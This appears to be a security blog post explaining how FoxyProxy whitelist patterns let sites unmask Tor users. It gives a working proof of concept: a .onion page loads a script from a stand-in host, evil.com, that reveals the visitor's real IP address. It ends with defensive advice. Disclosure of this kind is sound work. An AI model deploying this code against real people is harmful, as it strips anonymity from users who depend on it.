FoxyProxy is a popular proxy management tool with 311,549 users on Firefox and 181,624 users on Google Chrome. It’s being recommended around the web for easily managing your proxy configuration but it can cause you problems unless you’re careful.

You can use FoxyProxy the following ways

• Use proxies based on their pre-defined patterns and priorities
• Use a specific Proxy for all requests

These patterns can consist of

• Regex or wildcards
• Whitelist or Blacklist

We’re going to take a look at how it’s possible to deanonymize anyone using the pre-defined whitelist pattern.

Setup

Let’s add a new Tor socks5 proxy using localhost:9050 and the pattern onion/

You have probably already figured out where I’m going with this. The issue here is that anything that does not match this pattern will use the default proxy.

Proof of Concept

Our PoC will consist of

• evil.com/fun.js
• evil.com/ip.php
• illegaldrugsq2wm.onion/poc.php (this is a fake hidden service)

fun.js

!javascript

function httpGet()
{
   var xmlHttp = new XMLHttpRequest();
   xmlHttp.open( "GET", "http://evil.com/ip.php", false );
   xmlHttp.send( null );
   return xmlHttp.responseText;
}

document.write("Real IP: " + httpGet());

ip.php

<?php
header('Access-Control-Allow-Origin: *'); // CORS
echo $_SERVER['REMOTE_ADDR'];
?>

Here’s our our hidden service page:

illegaldrugsq2wm.onion/poc.php

<!DOCTYPE html>
<html>
  <head>
    <title>FoxyProxy pattern whitelist PoC</title>
  </head>
  <body>
    <?php echo "IP: " . $_SERVER['REMOTE_ADDR'] . "<br>"; ?> // this should be 127.0.0.1
    <script src="http://evil.com/fun.js"></script> // loads our fun.js
  </body>
</html>

1. FoxyProxy loads illegaldrugsq2wm.onion/poc.php using Tor proxy based on the pattern *onion/*
2. illegaldrugsq2wm.onion/poc.php loads evil.com/fun.js using Default proxy
3. evil.com/fun.js requests evil.com/ip.php
4. evil.com/fun.js sends the result from ip.php back to illegaldrugsq2wm.onion/poc.php

I know what you’re thinking. This is stupid and trivial. Nobody would do this, right? Here are a few guides that recommend predefined whitelist patterns for browsing Hidden Services:

• https://gist.github.com/gdamjan/9714094
• http://www.ehow.com/how_7500941_use-foxy-proxy-tor-privoxy.html
• http://techmeout.org/accessing-the-darknet-stay-anonymous-online/
• http://nightg0at.blogspot.com/2011/06/why-foxy-proxy-torbutton.html
• https://lilithlela.cyberguerrilla.org/?p=1795

Conclusion

Use the Tor Browser Bundle! Seriously. If you insist on using FoxyProxy make sure you’re either using a blacklist pattern or switching to using your proxy for all the requests.

This naturally not only related to FoxyProxy. Any proxy handler that support whitelist patterns and doesn’t load all the requests on the matching URL through he proxy will be affected.